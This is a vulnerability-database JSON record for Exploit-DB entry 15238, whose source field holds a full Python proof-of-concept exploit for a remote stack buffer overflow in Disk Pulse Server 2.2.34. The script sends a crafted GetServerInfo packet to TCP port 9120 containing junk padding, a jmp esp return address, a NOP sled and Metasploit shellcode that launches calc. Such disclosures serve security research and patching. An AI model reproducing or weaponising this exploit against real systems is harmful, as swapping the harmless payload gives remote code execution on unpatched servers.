DATABASE RESOURCES PRICING ABOUT US

{"id": "EDB-ID:15238", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Disk Pulse Server 2.2.34 - Remote Buffer Overflow", "description": "", "published": "2010-10-12T00:00:00", "modified": "2010-10-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/15238", "reporter": "xsploited security", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-16T04:54:58", "viewCount": 10, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-25004"]}]}, "exploitation": null, "vulnersScore": 0.6}, "_state": {"dependencies": 1661182887, "score": 1661184847, "epss": 1678791570}, "_internal": {"score_hash": "41cd5af6f7b1eeb9e768da64daee7d31"}, "sourceHref": "https://www.exploit-db.com/download/15238", "sourceData": "#!/usr/bin/python\r\n\r\n# Exploit Title: Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit\r\n# Date: 10/11/2010\r\n# Author: xsploited security\r\n# URL: http://www.x-sploited.com/\r\n# Contact: xsploitedsecurity [at] gmail.com\r\n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v2.2.34.exe\r\n# Version: v2.2.34\r\n# Tested on: Windows XP SP3 (Physical machine)\r\n# CVE : N/A\r\n\r\n# Vulnerability Information:\r\n# A vulnerability exists in the way Disk Pulse Server v2.2.34 process a remote clients \"GetServerInfo\" request.\r\n# The vulnerability is caused due to a boundary error in libpal.dll when handling network messages and can be exploited\r\n# to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 9120.\r\n\r\n# Other notes:\r\n# It appears the vendor likes using the same server code (that was effected by my previous PoC: http://www.exploit-db.com/exploits/15231)\r\n# for everything client/server related. It is also safe to say that the client(s) are most likely effected by bugs as well.\r\n\r\n# Other possibly affected versions:\r\n# Disk Pulse Server <= 1.7.x\r\n\r\n# References:\r\n# http://secunia.com/advisories/41748/\r\n# http://www.exploit-db.com/exploits/15231\r\n# http://securityreason.com/exploitalert/9247\r\n\r\n# Shouts:\r\n# kAoTiX, MAX, CorelanCoder, exploit-db (of course), all other security crews and sites.\r\n\r\nimport sys,socket\r\n\r\nif len(sys.argv) != 2:\r\n print \"[!] Usage: ./diskpulse.py <Target IP>\"\r\n sys.exit(1)\r\n\r\nabout = \"=================================================\\n\"\r\nabout += \"Title: Disk Pulse Server v2.2.34 Remote BOF PoC\\n\"\r\nabout += \"Author: xsploited security\\nURL: http://www.x-sploited.com/\\n\"\r\nabout += \"Contact: xsploitedsecurity [at] gmail.com\\n\"\r\nabout += \"=================================================\\n\"\r\nprint about\r\n\r\nhost = sys.argv[1]\r\nport = 9120 #default server port\r\n\r\n# windows/exec - 218 bytes / http://www.metasploit.com\r\n# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc\r\ncalc = (\"\\x6a\\x31\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x97\\x8c\" \r\n\"\\x8a\\x10\\x83\\xeb\\xfc\\xe2\\xf4\\x6b\\x64\\x03\\x10\\x97\\x8c\\xea\\x99\" \r\n\"\\x72\\xbd\\x58\\x74\\x1c\\xde\\xba\\x9b\\xc5\\x80\\x01\\x42\\x83\\x07\\xf8\" \r\n\"\\x38\\x98\\x3b\\xc0\\x36\\xa6\\x73\\xbb\\xd0\\x3b\\xb0\\xeb\\x6c\\x95\\xa0\" \r\n\"\\xaa\\xd1\\x58\\x81\\x8b\\xd7\\x75\\x7c\\xd8\\x47\\x1c\\xde\\x9a\\x9b\\xd5\" \r\n\"\\xb0\\x8b\\xc0\\x1c\\xcc\\xf2\\x95\\x57\\xf8\\xc0\\x11\\x47\\xdc\\x01\\x58\" \r\n\"\\x8f\\x07\\xd2\\x30\\x96\\x5f\\x69\\x2c\\xde\\x07\\xbe\\x9b\\x96\\x5a\\xbb\" \r\n\"\\xef\\xa6\\x4c\\x26\\xd1\\x58\\x81\\x8b\\xd7\\xaf\\x6c\\xff\\xe4\\x94\\xf1\" \r\n\"\\x72\\x2b\\xea\\xa8\\xff\\xf2\\xcf\\x07\\xd2\\x34\\x96\\x5f\\xec\\x9b\\x9b\" \r\n\"\\xc7\\x01\\x48\\x8b\\x8d\\x59\\x9b\\x93\\x07\\x8b\\xc0\\x1e\\xc8\\xae\\x34\" \r\n\"\\xcc\\xd7\\xeb\\x49\\xcd\\xdd\\x75\\xf0\\xcf\\xd3\\xd0\\x9b\\x85\\x67\\x0c\" \r\n\"\\x4d\\xfd\\x8d\\x07\\x95\\x2e\\x8c\\x8a\\x10\\xc7\\xe4\\xbb\\x9b\\xf8\\x0b\" \r\n\"\\x75\\xc5\\x2c\\x72\\x84\\x22\\x7d\\xe4\\x2c\\x85\\x2a\\x11\\x75\\xc5\\xab\" \r\n\"\\x8a\\xf6\\x1a\\x17\\x77\\x6a\\x65\\x92\\x37\\xcd\\x03\\xe5\\xe3\\xe0\\x10\" \r\n\"\\xc4\\x73\\x5f\\x73\\xf6\\xe0\\xe9\\x10\");\r\n\t\r\n# Begin payload buffer:\r\n\r\npacket_header = (\"\\x47\\x65\\x74\\x53\\x65\\x72\\x76\\x65\\x72\\x49\\x6E\\x66\\x6F\\x02\");\t\t# ASCII = \"GetServerInfo.\"\r\n\r\njunk = \"\\x41\" * 256; \t\t\t#256 byte junk buffer to reach eip\r\neip = \"\\xFB\\xF8\\xAB\\x71\";\t\t#jmp esp (via ws2_32.dll)\r\nnops = \"\\x90\" * 12;\t\t\t\t#small nop sled\r\n\r\n# packet structure:\r\n# [header][junk][eip][nops][shellcode][nops][nops]\r\npacket = packet_header + junk + eip + nops + calc + nops + nops;\r\n\r\nprint \"[*] Connecting to \" + host + \"...\\r\"\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((host,port))\r\nprint \"[*] Connected, Sending payload\\r\"\r\ns.send(packet + \"\\r\\n\")\r\nprint \"[*] Payload sent successfully\"\r\nprint \"[*] Check the results\\r\"\r\ns.close()", "osvdbidlist": ["68610"], "exploitType": "remote", "verified": true}

{}